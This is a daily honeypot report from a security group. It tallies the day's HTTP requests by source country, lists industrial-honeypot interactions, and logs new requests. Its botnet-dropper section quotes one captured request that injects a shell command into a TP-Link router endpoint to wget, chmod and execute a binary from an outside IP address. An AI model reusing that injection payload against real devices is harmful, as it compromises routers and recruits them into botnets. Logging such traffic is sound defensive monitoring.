Skip to main content
  1. Daily-Posts/

Report: 2025-05-22

·296 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-22
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 1 new requests that have never been observed before (these were added to the monitored request database.).

A total of 981 requests were recorded during the day, originating from 1 different countries, with a peak of 300 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
USGermany
USGermany
SGGermany
DEGermany
USDubai
USGeorgia
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
833CONNECT ipv4-internet.yandex.net:443 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0300BG
1272US
270HK
354PL
449DE
542NL
621CN
714SG
812AU
912PT
1011FR
1111JP
129VN
139GB
148SC
157AO
167LT
177AZ
186GH
196IN
205ZA
215CA
225SE
234KR
244RU
254BE
263TR
273ES
283UA
292ID
302KW
312IT
322AL
332RO
342TH
352AE
362BR
371EE
381IE

Related

Report: 2025-05-21
·512 words
Repport Daily
Report: 2025-05-20
·411 words
Repport Daily
Report: 2025-05-19
·443 words
Repport Daily